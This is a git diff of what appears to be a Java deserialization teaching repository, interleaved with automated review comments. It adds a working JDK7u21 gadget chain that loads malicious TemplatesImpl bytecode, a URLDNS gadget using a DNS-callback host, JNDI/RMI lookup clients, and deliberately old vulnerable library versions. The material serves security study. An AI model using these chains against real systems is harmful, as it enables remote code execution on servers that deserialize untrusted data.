diff --git a/README.md b/README.md index dbfc6f7..870ec80 100644 --- a/README.md +++ b/README.md 
@@ -22,26 +22,29 @@ - [Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) - [Java安全漫谈 - 16.commons-collections4与漏洞修复](https://t.zsxq.com/ZBQj2FE) - [Java安全漫谈 - 17.CommonsBeanutils与无commons-collections的Shiro反序列化利用](https://t.zsxq.com/IqBmuF6) +- [Java安全漫谈 - 18.原生反序列化利用链JDK7u21](https://t.zsxq.com/neMbuJa) +- [Java安全漫谈 - 19.Java反序列化协议构造与分析](https://t.zsxq.com/ZfiEeEY) ## Demo代码 字节码: -- 远程字节码加载Demo:[HelloClassLoader](general/src/main/java/com/govuln/bytes/HelloClassLoader.java) -- 系统默认defineClass加载字节码Demo:[HelloDefineClass](general/src/main/java/com/govuln/bytes/HelloDefineClass.java) -- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) -- 使用BCEL加载字节码Demo:[HelloBCEL](general/src/main/java/com/govuln/bytes/HelloBCEL.java) +- 远程字节码加载Demo:[HelloClassLoader](jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java) +- 系统默认defineClass加载字节码Demo:[HelloDefineClass](jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java) +- 使用TemplatesImpl加载字节码Demo:[HelloTemplatesImpl](jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java) +- 使用BCEL加载字节码Demo:[HelloBCEL](jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java) 反序列化: -- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) -- 我简化的[CommonsCollections6](general/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 -- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) -- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) -- 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) -- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) 
-- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) -- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](https://github.com/phith0n/JavaThings/blob/master/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 最简单的Transformer Demo:[CommonsCollectionsIntro.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java) +- 我简化的[CommonsCollections6](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java),更方便大家理解 +- 利用TemplatesImpl构造的Transformer Demo:[CommonsCollectionsIntro2.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java) +- 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) +- 我简化的[CommonsCollections3](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java) +- CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) +- 我简化的CommonsBeanutils1利用链:[CommonsBeanutils1](jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java) +- 简化版Java原生利用链 [JDK7u21](jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java) Shiro反序列化: 
@@ -49,3 +52,8 @@ Shiro反序列化: - 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 - 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 - 使用Shiro默认自带的commons-beanutils构造的反序列化利用链:[CommonsBeanutils1Shiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsBeanutils1Shiro.java) + +自研反序列化分析工具: + +- zkar: +- 如何使用zkar修复SerialVersionUID不匹配的问题: diff --git a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java b/general/src/main/java/com/govuln/bytes/HelloDefineClass.java deleted file mode 100644 index 9ae4bb9..0000000 --- a/general/src/main/java/com/govuln/bytes/HelloDefineClass.java +++ /dev/null @@ -1,16 +0,0 @@ -package com.govuln.bytes; - -import java.lang.reflect.Method; -import java.util.Base64; - -public class HelloDefineClass { - public static void main(String[] args) throws Exception { - Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class); - defineClass.setAccessible(true); - - // source: bytecodes/Hello.java - byte[] code = Base64.getDecoder().decode("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"); - Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length); - hello.newInstance(); - } -} diff --git a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java deleted file mode 100644 index 598788e..0000000 --- a/general/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java +++ /dev/null 
@@ -1,26 +0,0 @@ -package com.govuln.bytes; - -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; - -import java.lang.reflect.Field; -import java.util.Base64; - -public class HelloTemplatesImpl { - public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { - Field field = obj.getClass().getDeclaredField(fieldName); - field.setAccessible(true); - field.set(obj, value); - } - - public static void main(String[] args) throws Exception { - // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); - TemplatesImpl obj = new TemplatesImpl(); - setFieldValue(obj, "_bytecodes", new byte[][] {code}); - setFieldValue(obj, "_name", "HelloTemplatesImpl"); - setFieldValue(obj, "_tfactory", new TransformerFactoryImpl()); - - obj.newTransformer(); - } -} diff --git a/general/bytecodes/Foo.java b/jdk8/bytecodes/Foo.java similarity index 100% rename from general/bytecodes/Foo.java rename to jdk8/bytecodes/Foo.java diff --git a/general/bytecodes/Hello.java b/jdk8/bytecodes/Hello.java similarity index 100% rename from general/bytecodes/Hello.java rename to jdk8/bytecodes/Hello.java diff --git a/general/bytecodes/HelloTemplatesImpl.java b/jdk8/bytecodes/HelloTemplatesImpl.java similarity index 100% rename from general/bytecodes/HelloTemplatesImpl.java rename to jdk8/bytecodes/HelloTemplatesImpl.java diff --git a/general/pom.xml b/jdk8/pom.xml similarity index 65% rename from general/pom.xml rename to jdk8/pom.xml index 8ad9f54..fb1091e 100644 --- a/general/pom.xml +++ b/jdk8/pom.xml @@ -14,8 +14,8 @@ UTF-8 - 1.8 - 1.8 + 8 + 8 
@@ -42,6 +42,47 @@ javassist 3.12.1.GA + + + commons-codec + commons-codec + 1.15 + + + + commons-io + commons-io + 2.10.0 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.18 + + + + + org.yaml + snakeyaml + 1.33 + + + + + com.alibaba + fastjson + 1.2.24 + + + + + org.apache.bcel + bcel + 6.10.0 + + @@ -89,15 +130,15 @@ - - - org.apache.maven.plugins - maven-compiler-plugin - - 8 - 8 - - - + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + diff --git a/general/src/main/java/com/govuln/beans/Cat.java b/jdk8/src/main/java/com/govuln/beans/Cat.java similarity index 100% rename from general/src/main/java/com/govuln/beans/Cat.java rename to jdk8/src/main/java/com/govuln/beans/Cat.java diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloBCEL.java rename to jdk8/src/main/java/com/govuln/bytes/HelloBCEL.java diff --git a/general/src/main/java/com/govuln/bytes/HelloClassLoader.java b/jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java similarity index 100% rename from general/src/main/java/com/govuln/bytes/HelloClassLoader.java rename to jdk8/src/main/java/com/govuln/bytes/HelloClassLoader.java diff --git a/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java new file mode 100644 index 0000000..93c46ac --- /dev/null +++ b/jdk8/src/main/java/com/govuln/bytes/HelloDefineClass.java 
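Review bot: The dependency block added in the `@@ -42,6 +42,47 @@` hunk pins fastjson 1.2.24, snakeyaml 1.33, bcel 6.10.0 and spring-boot-starter-web 2.7.18 without recording why those particular releases were chosen; from the version numbers these look like deliberately old releases kept for the deserialization demos in this module, but nothing in the pom says so. An XML comment above the block such as `<!-- versions are pinned on purpose for the vulnerability demos in this module; do not bump them without updating the matching demo -->` would stop a dependency scanner or a well-meaning contributor from upgrading them and silently breaking the examples. The pom markup has lost its element tags in this rendering, so the exact element the comment should sit above cannot be confirmed here.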
@@ -0,0 +1,17 @@
+package com.govuln.bytes;
+
+import org.apache.commons.codec.binary.Base64;
+
+import java.lang.reflect.Method;
+
+public class HelloDefineClass {
+ public static void main(String[] args) throws Exception {
+ Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
+ defineClass.setAccessible(true);
+
+ // source: bytecodes/Hello.java
+ byte[] code = Base64.decodeBase64("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");
+ Class hello = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(), "Hello", code, 0, code.length);
+ hello.newInstance();
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java
new file mode 100644
index 0000000..c8fae6f
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/bytes/HelloTemplatesImpl.java
@@ -0,0 +1,26 @@
+package com.govuln.bytes;
+
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import org.apache.commons.codec.binary.Base64;
+
+import java.lang.reflect.Field;
+
+public class HelloTemplatesImpl {
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String[] args) throws Exception {
+ // source: bytecodes/HelloTemplateImpl.java
+ byte[] code = Base64.decodeBase64("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");
+ TemplatesImpl obj = new TemplatesImpl();
+ setFieldValue(obj, "_bytecodes", new byte[][] {code});
+ setFieldValue(obj, "_name", "HelloTemplatesImpl");
+ setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());
+
+ obj.newTransformer();
+ }
+}
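Review bot: The move from `java.util.Base64` to commons-codec `Base64.decodeBase64` on the `byte[] code = ...` line of HelloDefineClass changes failure behaviour: the JDK decoder throws `IllegalArgumentException` on malformed input, while commons-codec (lenient by default in the 1.15 release this commit pins) silently skips characters outside its alphabet, so a corrupted constant would most likely surface later as a `ClassFormatError` wrapped in `InvocationTargetException` from `defineClass` rather than at the decode site. That is harmless for an embedded constant but deserves a one-line comment, e.g. `// commons-codec decoding is lenient: bad input yields truncated bytes, not an exception`, because the same substitution is repeated in HelloTemplatesImpl on this line and in CommonsCollectionsIntro2, CommonsCollectionsIntro3 and TemplatesImplDeserialization further down. The commit does not say why the JDK decoder was dropped; if it is to keep the sources usable on a pre-8 JDK, recording that next to the new commons-codec dependency would help the next reader.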
diff --git a/jdk8/src/main/java/com/govuln/client/JNDIClient.java b/jdk8/src/main/java/com/govuln/client/JNDIClient.java
new file mode 100644
index 0000000..f045cb4
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/JNDIClient.java
@@ -0,0 +1,14 @@
+package com.govuln.client;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.directory.InitialDirContext;
+import javax.naming.ldap.InitialLdapContext;
+import java.util.Hashtable;
+
+public class JNDIClient {
+ public static void main(String[] args) throws Exception {
+ Context initialContext = new InitialContext();
+ initialContext.lookup("ldap://127.0.0.1:389/sample");
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/client/LDAPClient.java b/jdk8/src/main/java/com/govuln/client/LDAPClient.java
new file mode 100644
index 0000000..8f68ba1
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/LDAPClient.java
@@ -0,0 +1,21 @@
+package com.govuln.client;
+
+import javax.naming.Context;
+import javax.naming.InitialContext;
+import javax.naming.NamingException;
+import javax.naming.directory.InitialDirContext;
+import java.util.Hashtable;
+
+public class LDAPClient {
+ public static void main(String[] args) throws NamingException {
+ Hashtable env = new Hashtable<>();
+ env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.ldap.LdapCtxFactory");
+ env.put(Context.SECURITY_AUTHENTICATION, "simple");
+ env.put(Context.SECURITY_PRINCIPAL, "user");
+ env.put(Context.SECURITY_CREDENTIALS, "password");
+ env.put(Context.PROVIDER_URL, "ldap://127.0.0.1:389");
+ InitialContext ctx = new InitialDirContext(env);
+ ctx.lookup("sample");
+ ctx.close();
+ }
+}
diff --git a/jdk8/src/main/java/com/govuln/client/RMIClient.java b/jdk8/src/main/java/com/govuln/client/RMIClient.java
new file mode 100644
index 0000000..00c6ef2
--- /dev/null
+++ b/jdk8/src/main/java/com/govuln/client/RMIClient.java
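Review bot: In LDAPClient.main, `ctx.close()` is only reached when `ctx.lookup("sample")` succeeds; a `NamingException` from the lookup propagates out of `main` and leaves the directory connection open until garbage collection. `try { ctx.lookup("sample"); } finally { ctx.close(); }` keeps the demo identical on the happy path and releases the socket on failure. The `"user"` / `"password"` values passed as `SECURITY_PRINCIPAL` / `SECURITY_CREDENTIALS` read as placeholders for a local test directory; a comment saying so (`// placeholder credentials for a local test LDAP server`) would keep them from being mistaken for real ones by a secret scanner or a reader. JNDIClient imports `InitialDirContext`, `InitialLdapContext` and `Hashtable` without using any of them.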
@@ -0,0 +1,9 @@
+package com.govuln.client;
+
+import java.rmi.Naming;
+
+public class RMIClient {
+ public static void main(String[] args) throws Exception {
+ Naming.lookup("rmi://localhost:1099/test");
+ }
+}
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsBeanutils1.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java
similarity index 100%
rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2.java
rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2.java
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections2TemplatesImpl.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java similarity index 99% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java index 521ce73..d8cce44 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollections3.java +++ b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3.java @@ -20,7 +20,6 @@ import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; -import java.util.Base64; import java.util.HashMap; import java.util.Map; diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6.java 
diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java similarity index 100% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro.java diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java similarity index 55% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java index d50a6ed..1ed70dd 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java +++ b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro2.java 
@@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; @@ -9,7 +10,6 @@ import org.apache.commons.collections.Transformer; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; @@ -22,7 +22,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java similarity index 58% rename from general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java rename to jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java index 0694a86..c7b8427 100644 --- a/general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java +++ b/jdk8/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java 
@@ -3,6 +3,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InstantiateTransformer; @@ -11,7 +12,6 @@ import javax.xml.transform.Templates; import java.lang.reflect.Field; -import java.util.Base64; import java.util.HashMap; import java.util.Map; 
@@ -24,7 +24,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("yv66vgAAADQAIQoABgASCQATABQIABUKABYAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgEAClNvdXJjZUZpbGUBABdIZWxsb1RlbXBsYXRlc0ltcGwuamF2YQwADgAPBwAbDAAcAB0BABNIZWxsbyBUZW1wbGF0ZXNJbXBsBwAeDAAfACABABJIZWxsb1RlbXBsYXRlc0ltcGwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAIAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAACgALAAAABAABAAwAAQAOAA8AAQAJAAAALQACAAEAAAANKrcAAbIAAhIDtgAEsQAAAAEACgAAAA4AAwAAAA0ABAAOAAwADwABABAAAAACABE="); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][] {code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java new file mode 100644 index 0000000..a7824f5 --- /dev/null +++ b/jdk8/src/main/java/com/govuln/deserialization/JDK7u21.java 
@@ -0,0 +1,68 @@ +package com.govuln.deserialization; + +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import javassist.ClassPool; +import org.apache.commons.codec.binary.Base64; + +import javax.xml.transform.Templates; +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationHandler; +import java.lang.reflect.Proxy; +import java.util.HashMap; +import java.util.HashSet; +import java.util.LinkedHashSet; +import java.util.Map; + +public class JDK7u21 { + public static void main(String[] args) throws Exception { + TemplatesImpl templates = new TemplatesImpl(); + setFieldValue(templates, "_bytecodes", new byte[][]{ + ClassPool.getDefault().get(evil.EvilTemplatesImpl.class.getName()).toBytecode() + }); + setFieldValue(templates, "_name", "HelloTemplatesImpl"); + setFieldValue(templates, "_tfactory", new TransformerFactoryImpl()); + + String zeroHashCodeStr = "f5a5a608"; + + // 实例化一个map,并添加Magic Number为key,也就是f5a5a608,value先随便设置一个值 + HashMap map = new HashMap(); + map.put(zeroHashCodeStr, "foo"); + + // 实例化AnnotationInvocationHandler类 + Constructor handlerConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class); + handlerConstructor.setAccessible(true); + InvocationHandler tempHandler = (InvocationHandler) handlerConstructor.newInstance(Templates.class, map); + + // 为tempHandler创造一层代理 + Templates proxy = (Templates) Proxy.newProxyInstance(JDK7u21.class.getClassLoader(), new Class[]{Templates.class}, tempHandler); + + // 实例化HashSet,并将两个对象放进去 + HashSet set = new LinkedHashSet(); + set.add(templates); + set.add(proxy); + + // 将恶意templates设置到map中 + map.put(zeroHashCodeStr, templates); + + ByteArrayOutputStream 
barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new ObjectOutputStream(barr); + oos.writeObject(set); + oos.close(); + + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } + + public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception { + Field field = obj.getClass().getDeclaredField(fieldName); + field.setAccessible(true); + field.set(obj, value); + } +} diff --git a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java similarity index 69% rename from general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java rename to jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java index ec9aa5e..c2ff080 100644 --- a/general/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java +++ b/jdk8/src/main/java/com/govuln/deserialization/TemplatesImplDeserialization.java @@ -2,6 +2,7 @@ import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import org.apache.commons.codec.binary.Base64; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; @@ -20,7 +21,6 @@ import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; -import java.util.Base64; import java.util.HashMap; import java.util.Map; 
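Review bot: `ObjectInputStream ois` at the end of JDK7u21.main is never closed and `Object o` is never read; `oos` is closed by hand even though try-with-resources is available on the module's Java 8 target. The rewritten tail below keeps the same behaviour and drops the unused local; the gadget construction above it is untouched. `evil.EvilTemplatesImpl`, whose bytecode is pulled through javassist on the `ClassPool.getDefault().get(...)` line, does not appear anywhere in this chunk of the diff, so if it is not added elsewhere in the commit the file will not compile.
```java
// … unchanged: templates / map / proxy / set construction …
ByteArrayOutputStream barr = new ByteArrayOutputStream();
try (ObjectOutputStream oos = new ObjectOutputStream(barr)) {
    oos.writeObject(set);
}

System.out.println(barr);
try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()))) {
    ois.readObject();
}
```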
@@ -33,7 +33,7 @@ public static void setFieldValue(Object obj, String fieldName, Object value) thr public static void main(String[] args) throws Exception { // source: bytecodes/HelloTemplateImpl.java - byte[] code = Base64.getDecoder().decode("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"); + byte[] code = Base64.decodeBase64("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"); TemplatesImpl obj = new TemplatesImpl(); setFieldValue(obj, "_bytecodes", new byte[][]{code}); setFieldValue(obj, "_name", "HelloTemplatesImpl"); diff --git a/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java new file mode 100644 index 0000000..296614c --- /dev/null +++ b/jdk8/src/main/java/com/govuln/deserialization/URLDNS.java 
@@ -0,0 +1,52 @@
+package com.govuln.deserialization;
+
+import java.io.*;
+import java.lang.reflect.Field;
+import java.net.InetAddress;
+import java.net.URL;
+import java.net.URLConnection;
+import java.net.URLStreamHandler;
+import java.util.HashMap;
+
+public class URLDNS {
+
+ static class SilentURLStreamHandler extends URLStreamHandler {
+
+ protected URLConnection openConnection(URL u) throws IOException {
+ return null;
+ }
+
+ protected synchronized InetAddress getHostAddress(URL u) {
+ return null;
+ }
+ }
+
+ public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
+ Field field = obj.getClass().getDeclaredField(fieldName);
+ field.setAccessible(true);
+ field.set(obj, value);
+ }
+
+ public static void main(String []args) throws Exception {
+ String url = "http://dns.675ba661.y7z.xyz";
+
+ //Avoid DNS resolution during payload creation
+ //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload.
+ URLStreamHandler handler = new SilentURLStreamHandler();
+
+ HashMap ht = new HashMap(); // HashMap that will contain the URL
+ URL u = new URL(null, url, handler); // URL to use as the Key
+ ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
+
+ setFieldValue(u, "hashCode", -1);
+
